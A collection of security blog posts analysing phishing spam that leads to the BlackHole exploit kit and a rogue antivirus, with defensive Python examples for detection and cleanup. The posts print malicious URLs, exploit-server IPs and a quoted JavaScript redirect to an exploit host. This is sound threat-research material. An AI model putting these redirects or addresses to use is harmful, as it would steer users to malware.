US Bank spam loads malware

A couple of variations for this US Bank scam:

Payload arrives from:

eurodynamic.fr/RQ1Pn7tW/index.html

a French site using Parallels’ Plesk interface:

which loads:

cosad.org/troWg0MB/js.js
fleetoffreedom.com/WEeuQHsH/js.js
maisonesquive.fr/yQqJfaoT/js.js
leofoto.it/t8kprRSB/js.js

And same final payload as previous post:

188.165.65.221/showthread.php?t=4a6d866826776084

American Express spam leads to exploit and malware

A phishing scam impersonating Amex is loading malware onto PCs.

“Dear Customer, Our response is ready for you. Please login to the Secure Message Center to read it.”

The link points to:

sitildc.altervista.org/1y5zvsLm/index.html

It contains further links to javascript files:

falco48.altervista.org/0Kj8sF5v/js.js
ftp.certifiedfolder.com/BtUHDQRY/js.js
sushiminto.com/zPXs6eBz/js.js
santoromichele.it/acg5csdZ/js.js

The javascript js.js loads:

document.location='http://188.165.65.221/showthread.php?t=d7ad916d1c0396ff';

This is the final exploit code:

It comes from a server located in Roubaix, France (188.165.65.221).

Check out the Wepawet Report here. And the files it drops (89ce2b837bf2dcfa74dacffb07e6d263).

First Class ticket to BlackHole Exploit Kit

Here is a spam email pretending to be from US Airways:

You can check in from 24 hours and up to 60 minutes before your flight (2 hours if you’re flying abroad). Then, all you need to do is print your boarding pass and head to the gate.

Confirmation code: 755536

Check-in online: Online reservation details

Clicking on the link to view flight 8160 takes you to a malicious webpage that loads the BlackHole Exploit Kit where you can expect some turbulence:

Here is the traffic log:

imin2magic.com/admin/upload/agFjlln.html
arizonacentennialmens.com/main.php?page=c69cc723b6722b3a
imin2magic.com/favicon.ico
arizonacentennialmens.com/data/Pol.jar
arizonacentennialmens.com/w.php?f=79c45&e=0
arizonacentennialmens.com/w.php?e=5&f=79c45
scanforsecurytyholes.ru/mev/in/
testnosecurity.ru/mev/in/

And here is the BlackHole login page:

IP: 188.62.171.7 (Switzerland).

This is where the bad guys keep track of how many PCs they have managed to infect, where they can update the malicious payload, get stats etc…

The email campaigns are getting better and better at circumventing spam filters and the emails use themes that keep on changing. Remember to be very cautious when clicking any link or picture from an email, even if you think it is just an advert.

Jerome Segura

Old PornTube, New Rogue AV

It’s one of those days when you have a bit of nostalgia for the stuff you used to do. Back a year or so ago, I used to hunt down fake AV and the like. It involved fake YouTube sites, porn and more porn.

Out of curiosity, I started some searches, the same that I used to do to find the bad stuff.

Like I said, this is quite old (Feb 2011). I clearly remember redspacetube.com, it used to do redirections to various sites using Dynamic DNS.

Guess what? It’s still working!

seonetwizard.com/in.cgi?16&parameter=%3ftube-videos
seonetwizard.com/in.cgi?4
seonetwizard.com/in.cgi?14
directredirection.com/LI8wbTB8ycreCciKd26F8mpTD70hFJDu.php?sid=3
ygafigyuhigi.mrface.com/land/?n=loli&id=1

The DNS service is provided by changeIP.com (click to enlarge):

This page is quite familiar but looks ancient by now…

The file takes forever and a day to download…:

ygafigyuhigi.mrface.com/land/maindirectory/adobeflashplayerv10.2.152.32.exe

The very low detection rate on VirusTotal makes me wonder whether this file is really old or just too new… (2/41).

Next, I checked whether the file was half broken… but clearly it was working just fine:

It installs a fake AV called “Windows Trouble Taker” (should have been called Trouble Maker IMHO ;-) )

A quick search confirms this is not an old rogue AV, but rather the new kid on the block:

This is one tenacious fake porn tube… Can someone unplug redspacetube.com for good?

Jerome Segura

A real life example of a website cleanup after malware infection

Yesterday I cleaned up a site hosted on Bluehost. I will show you how I proceeded from malware identification to removal.

First, I did a quick look up on StopBadware’s Clearing House:

It reported three different links containing malware. I opened them in a VM, looked at the source code and confirmed the problem:

It was time for a full website inspection and clean up.

I got access to the cPanel admin account; unfortunately SSH was not enabled (it isn’t by default, and you need to contact customer support). So, I went with FTP instead.

The thing with FTP is that you need to browse each folder by hand and you can’t run a script.

The site being relatively small, I downloaded a local copy. This makes it easy to do all the work with whatever scripts and tools you have installed.

The code was found in almost all the ‘.php’ files (and there were a lot of them!):

A grep command was able to find all the files containing these pieces of code:

Before making any changes, I backed up each file with a ‘.bak’ extension. Each file was then disinfected using a sed command.
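As an added illustration of that grep, backup and sed workflow (this is not the author's actual command line, and the injected code appears in the post only as an image, so a constructed marker line stands in for it), here is a Python equivalent run over a local copy of the site: find every .php file containing the marker, copy it to .bak, then rewrite it without the injected lines. The function names and the sample site tree are constructed for this example.

```python
"""Added example (not the post's own commands): a Python equivalent of the
grep -rl -> cp file file.bak -> sed '/marker/d' clean-up described above,
run over a local copy of the site. The injected PHP is only shown as an
image in the post, so a constructed marker line stands in for it here."""
import os
import shutil
import tempfile

# Constructed stand-in for the injected snippet found at the top of each file.
INJECTED_LINE = '<?php /* INJECTED_MARKER_PLACEHOLDER */ ?>'


def find_infected(root, marker=INJECTED_LINE):
    """grep -rl equivalent: return the .php files under root that contain the marker."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith('.php'):        # .bak copies are skipped on purpose
                continue
            path = os.path.join(dirpath, name)
            with open(path, 'r', encoding='utf-8', errors='replace') as fh:
                if marker in fh.read():
                    hits.append(path)
    return sorted(hits)


def disinfect(root, marker=INJECTED_LINE):
    """Back up every infected file as <name>.bak, then drop the lines carrying
    the marker (the sed '/marker/d' step). Returns the list of cleaned paths."""
    cleaned = []
    for path in find_infected(root, marker):
        shutil.copy2(path, path + '.bak')        # untouched copy first, always
        with open(path + '.bak', 'r', encoding='utf-8', errors='replace') as src:
            kept = [line for line in src if marker not in line]
        with open(path, 'w', encoding='utf-8') as dst:
            dst.writelines(kept)
        cleaned.append(path)
    return cleaned


def build_sample_site(root):
    """Constructed site tree: two infected PHP files, one clean PHP file, and a
    non-PHP file that also carries the marker and must be left alone."""
    os.makedirs(os.path.join(root, 'inc'), exist_ok=True)
    files = {
        'index.php': INJECTED_LINE + '\n<?php\necho "home";\n',
        os.path.join('inc', 'footer.php'): INJECTED_LINE + '\n<?php\necho "footer";\n',
        os.path.join('inc', 'config.php'): '<?php\n$debug = false;\n',
        'notes.txt': INJECTED_LINE + '\n',
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), 'w', encoding='utf-8') as fh:
            fh.write(body)


def demo():
    """Run the whole workflow on a throwaway copy.
    Returns (infected before, infected after, cleaned index.php contents)."""
    root = tempfile.mkdtemp(prefix='site_copy_')
    try:
        build_sample_site(root)
        before = len(find_infected(root))
        disinfect(root)
        after = len(find_infected(root))
        with open(os.path.join(root, 'index.php'), encoding='utf-8') as fh:
            restored = fh.read()
        return before, after, restored
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    print(demo())
```

The .bak copies keep the injected code available for later analysis (and for diffing against the cleaned files), which is the reason for backing up before editing rather than after.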

Website infections are very common. Because it is easy to set up a website but difficult to maintain it (from a security point of view), most websites fall to automated scripts exploiting vulnerabilities.

This particular website was affected by an XSS vulnerability:

At SparkTrust we look at both ends of the spectrum: We protect your site by doing regular security checks to make sure script kiddies can’t hack the site with readily available tools. But for our new customers that are already infected, we also provide disinfection services.

To learn more about our services please visit SparkTrust.com.

Jerome Segura

Malicious LinkedIn emails force BlackHole exploit kit

LinkedIn has always been targeted by the bad guys. I remember back a few years ago fake profiles by the thousands were used to load malware onto unsuspecting users’ computers.

Well, spammers have been launching email campaigns with fake LinkedIn invites or notifications:

Clicking on the link means trouble:

Here is one particular domain that was live when I wrote this blog entry.

sixlefts.comicgenesis.com/JnFh1KEz/index.html

That page loads several external javascripts (note they are all identical, but using more than one ensures that if one of the sites is down, the next one will be tried, therefore limiting the risk of a single point of failure).

174.133.92.122/MgGsg1Pp/js.js

The javascript loads the actual exploit toolkit:

41.222.33.141:8080/showthread.php?t=73a07bcb51f4be71
41.222.33.141:8080/favicon.ico
41.222.33.141:8080/content/hcp_vbs.php?f=14095&d=0
41.222.33.141:8080/q.php?e=5&f=14095
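The traffic logs in the US Airways, LinkedIn and Amex posts above share the same shape: an eight-character directory holding js.js, a landing page with a 16-hex-digit token, then a short-named PHP script fetched with f= and e= parameters. As an added example (not the author's tooling, and not a vendor signature), here is detection logic that generalises those URL shapes into regular expressions and runs them over the log lines quoted in these posts; the rule names and the two-rule threshold are choices made here.

```python
"""Added example, not from the posts: flag exploit-kit traffic in a proxy log by
URL shape. The patterns generalise the URLs quoted in the posts above; the rule
names and the corroboration threshold are constructed for this example."""
import re

# Log lines quoted in the posts (US Airways, LinkedIn, Amex campaigns), plus the
# benign serverpro.com line from a later post as a control.
LOG_LINES = [
    'imin2magic.com/admin/upload/agFjlln.html',
    'arizonacentennialmens.com/main.php?page=c69cc723b6722b3a',
    'imin2magic.com/favicon.ico',
    'arizonacentennialmens.com/data/Pol.jar',
    'arizonacentennialmens.com/w.php?f=79c45&e=0',
    'arizonacentennialmens.com/w.php?e=5&f=79c45',
    'sixlefts.comicgenesis.com/JnFh1KEz/index.html',
    '174.133.92.122/MgGsg1Pp/js.js',
    '41.222.33.141:8080/showthread.php?t=73a07bcb51f4be71',
    '41.222.33.141:8080/favicon.ico',
    '41.222.33.141:8080/content/hcp_vbs.php?f=14095&d=0',
    '41.222.33.141:8080/q.php?e=5&f=14095',
    'falco48.altervista.org/0Kj8sF5v/js.js',
    '188.165.65.221/showthread.php?t=d7ad916d1c0396ff',
    'serverpro.com/',
]

# Host is a bare IPv4 address, optionally with a port (e.g. 41.222.33.141:8080).
IPV4_HOST = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/')

# Each rule generalises one URL shape seen in the logs above.
RULES = [
    ('landing_page_token', re.compile(r'/(?:showthread|main)\.php\?(?:t|page)=[0-9a-f]{16}$')),
    ('payload_request', re.compile(r'/[wq]\.php\?(?:e=\d+&f=[0-9a-f]+|f=[0-9a-f]+&e=\d+)$')),
    ('redirector_script', re.compile(r'/[A-Za-z0-9]{8}/js\.js$')),
    ('hcp_vbs_request', re.compile(r'/content/hcp_vbs\.php\?')),
    ('java_archive', re.compile(r'/data/[^/]+\.jar$')),
]


def classify(line):
    """Names of every rule matching one log line ([] when nothing matches).
    A bare-IP host is only added as a hit when another rule already fired,
    so favicon fetches from an IP do not create noise on their own."""
    hits = [name for name, rx in RULES if rx.search(line)]
    if hits and IPV4_HOST.match(line):
        hits.append('bare_ip_host')
    return hits


def triage(lines):
    """Map each host to the sorted set of distinct rules it triggered."""
    per_host = {}
    for line in lines:
        host = line.split('/', 1)[0]
        for name in classify(line):
            per_host.setdefault(host, set()).add(name)
    return {host: sorted(rules) for host, rules in per_host.items()}


def suspicious_hosts(lines, min_rules=2):
    """Hosts that triggered at least min_rules distinct rules; a single weak
    match (one js.js fetch) is reported by triage() but not escalated here."""
    return sorted(host for host, rules in triage(lines).items() if len(rules) >= min_rules)


if __name__ == '__main__':
    for host, rules in sorted(triage(LOG_LINES).items()):
        print(host, rules)
    print('escalate:', suspicious_hosts(LOG_LINES))
```

The shapes change from kit version to kit version, so rules like these are a triage aid for reading proxy logs, not a substitute for blocking the hosts themselves.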

This server’s IP is in South Africa; I was expecting something more like a Ukrainian or Russian hotspot…

Steer clear!

Jerome Segura

Huge text blurb allows malicious code to go undetected

I recently wrote a spider that crawls a site for malicious code. While testing it, I ran into a particular issue that I thought would be worth sharing.

The first thing this spider does is download the content of the site using a specially crafted wget command passing parameters such as user agent, number of tries, recursion level etc…

Then I came across a domain that had been hacked (as the picture below shows), but the page was so incredibly long that the spider got stuck downloading a huge file. With the length of the file unspecified, you cannot know in advance what you are up against…

This method could allow an attacker to fool security tools that try to parse a site’s source code in real-time, while still executing a malicious payload.
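The defensive fix for a scanner hitting a page like that is to bound the read by bytes actually received rather than by anything the server declares, and to treat a truncated read as a finding in its own right. As an added example (not the author's spider), here is a capped reader in Python; the cap size, helper names and the padded sample page are constructed for this example, and it reports the truncation rather than silently analysing half a page.

```python
"""Added example, not the author's spider: read a web page with a hard cap on the
bytes accepted, so an unbounded or padded page cannot stall the scanner or exhaust
its memory. The cap size, helper names and the sample page are constructed here."""
import io
import urllib.request

MAX_BYTES = 2 * 1024 * 1024   # constructed default: 2 MiB of markup is plenty to inspect
CHUNK = 64 * 1024


def read_capped(stream, max_bytes=MAX_BYTES):
    """Read from a file-like object until EOF or max_bytes, whichever comes first.

    Returns (data, truncated). The bound is enforced on bytes actually received,
    so it holds even when the server sends no Content-Length header.
    """
    buf = bytearray()
    while len(buf) < max_bytes:
        chunk = stream.read(min(CHUNK, max_bytes - len(buf)))
        if not chunk:
            return bytes(buf), False           # clean EOF below the cap
        buf.extend(chunk)
    # Cap reached: one more read tells us whether anything was actually cut off.
    return bytes(buf), bool(stream.read(1))


def cap_bytes(data, max_bytes=MAX_BYTES):
    """Convenience wrapper over read_capped for in-memory data."""
    return read_capped(io.BytesIO(data), max_bytes)


def fetch_capped(url, max_bytes=MAX_BYTES, timeout=20, user_agent='Mozilla/5.0'):
    """Fetch url with the cap applied. The declared Content-Length is recorded
    for the report but never trusted as the bound. Network call; not exercised
    by the offline demo below."""
    req = urllib.request.Request(url, headers={'User-Agent': user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        declared = resp.headers.get('Content-Length')
        body, truncated = read_capped(resp, max_bytes)
    return {'url': url, 'declared_length': declared,
            'received': len(body), 'truncated': truncated, 'body': body}


def demo():
    """Constructed page: a normal head, a long run of filler, and a script tag
    pushed far past the cap, mirroring the padded page described in the post."""
    page = b'<html><body>hello</body>' + b' ' * 5000 + b'<script src="x.js"></script>'
    body, truncated = cap_bytes(page, max_bytes=1024)
    # A truncated read is itself a finding: the scanner saw the head of the page
    # but must report that the tail, where the payload sat, was not inspected.
    return {'received': len(body), 'truncated': truncated,
            'head_intact': body.startswith(b'<html>'),
            'tail_seen': b'<script' in body}


if __name__ == '__main__':
    print(demo())
```

A scanner that silently analyses only the first few kilobytes would have passed this page as clean; surfacing the truncated flag turns the padding trick into an alert instead of a blind spot.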

Jerome Segura

Web host serverpro.com hacked, couple hundred thousand customers left hanging

The guys over at Sucuri have reported that web hosting company ServerPro has been hacked and their site defaced.

Before:

After:

Here is the traffic log when connecting to their site:

serverpro.com/
apprendre-le-hack.webobo.biz/haut/a/p/p/imghaut_apprendre-le-hack.jpg
www.youtube.com/v/2vz8LqWEjx4&feature=related&autoplay=1&loop=1
serverpro.com/favicon.ico
www.topcities.com/404.shtml

As far as I can tell, there is no malicious code.

The pic with the “pirate computer” is hosted on a French website which can be translated to “learn to hack” (apprendre le hack). Given the hackers’ signature, I have a feeling they may be from North Africa (and possibly Tunisia).

The hackers also embedded a YouTube soundtrack:

This sort of hack says a lot about web security… Even large companies with the proper resources can still fall to script kiddies exploiting known vulnerabilities or insecure passwords.

It’s quite easy to find out what this web server is running by looking at the HTTP header response:

Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9

Both Apache and PHP are out of date!

The latest Apache stable release is 2.2.22 (2.2 branch). The latest PHP version is 5.4.0 (or 5.3.10 for the old stable branch).

The version of Apache HTTP Server running on this host is affected by a denial of service vulnerability. Making a series of HTTP requests with overlapping ranges in the Range or Request-Range request headers can result in memory and CPU exhaustion. A remote, unauthenticated attacker could exploit this to make the system unresponsive. Exploit code is publicly available and attacks have reportedly been observed in the wild (CVE-2011-3192).

As if this was not enough, Apache 2.2.17 is also affected by these: CVE-2011-3368, CVE-2011-3607, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, CVE-2012-0053.

As far as PHP 5.2.9 goes, the list of CVEs is quite long and scary (59 in total).

Vulnerability scanning and patch management are not a panacea but have their place in making it more difficult for hackers to break into servers.
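The check described here, reading the Server and X-Powered-By headers and comparing each advertised version with the current release, is easy to automate. As an added example (not SparkTrust's scanner or the author's code), here is a parser for those two headers with a numeric version comparison; the baseline of "current" versions is constructed from the numbers this post states (Apache 2.2.22, PHP 5.3.10), and the function names are choices made here.

```python
"""Added example, not from the post: pull product/version tokens out of the
Server and X-Powered-By headers quoted above and compare them with the current
releases the post names. The baseline is constructed from the post's own numbers."""
import re

# Header values exactly as quoted in the post.
SERVER_HEADER = ('Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 '
                 'mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635')
POWERED_BY = 'PHP/5.2.9'

# Constructed baseline: the current releases stated in the post. Other products
# in the header are parsed but not judged, since the post gives no baseline for them.
CURRENT = {'Apache': '2.2.22', 'PHP': '5.3.10'}

# "Product/Version" tokens; parenthesised comments such as "(Unix)" are skipped
# because a product name must start with a letter and be followed by a slash.
TOKEN = re.compile(r'([A-Za-z][\w.-]*)/(\S+)')


def parse_products(header):
    """Return [(product, version), ...] from a Server-style header value."""
    return TOKEN.findall(header)


def version_key(version):
    """Tuple of the leading numeric components, so '0.9.8e-fips-rhel5' -> (0, 9, 8).
    Letter and distro suffixes are ignored; they do not sort numerically."""
    match = re.match(r'(\d+(?:\.\d+)*)', version)
    return tuple(int(part) for part in match.group(1).split('.')) if match else ()


def outdated(products, current=CURRENT):
    """[(product, seen, current)] for every product older than the baseline."""
    findings = []
    for name, seen in products:
        if name in current and version_key(seen) < version_key(current[name]):
            findings.append((name, seen, current[name]))
    return findings


def audit(server=SERVER_HEADER, powered_by=POWERED_BY):
    """Run the comparison over both headers from the post."""
    return outdated(parse_products(server) + parse_products(powered_by))


if __name__ == '__main__':
    for name, seen, latest in audit():
        print(f'{name} {seen} is behind {latest}')
```

Two caveats a practitioner would add: a server can hide or falsify these banners (Apache's ServerTokens directive, for instance), so a clean header proves nothing, and distributions often backport fixes without changing the advertised version, so a version-only comparison like this one can over-report. It is a quick first pass, not a vulnerability scan.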

Do you own a website? Have you ever checked what software is running on it? Try SparkTrust’s web vulnerability scanner and fix potential issues before it’s too late!

Jerome Segura

Who needs a new malware repo when you already got some?

Even though I’ve passed on most of my duties over at malwareblacklist.com, I still like to check out new user requests.

Here is one from a “Threat Research Analyst” at a company called Dyomo:

So I decided to take a look at dyomo.net, which redirects to dyomo.com:

I never like to see the “Java plug-in needs your permission to run” message. Although I must say thank you, Google, for it, as in most cases it means there is something not quite right with a website.

Well, I wasn’t mistaken on that one… obfuscated code is never a good sign:

This blurb translates into a malicious iframe:

tds38.findhere.org is hosted in Russia (91.196.216.149).

All I can say is for now this dude doesn’t need malwareblacklist.com, he can pick right from his own backyard.

Jerome Segura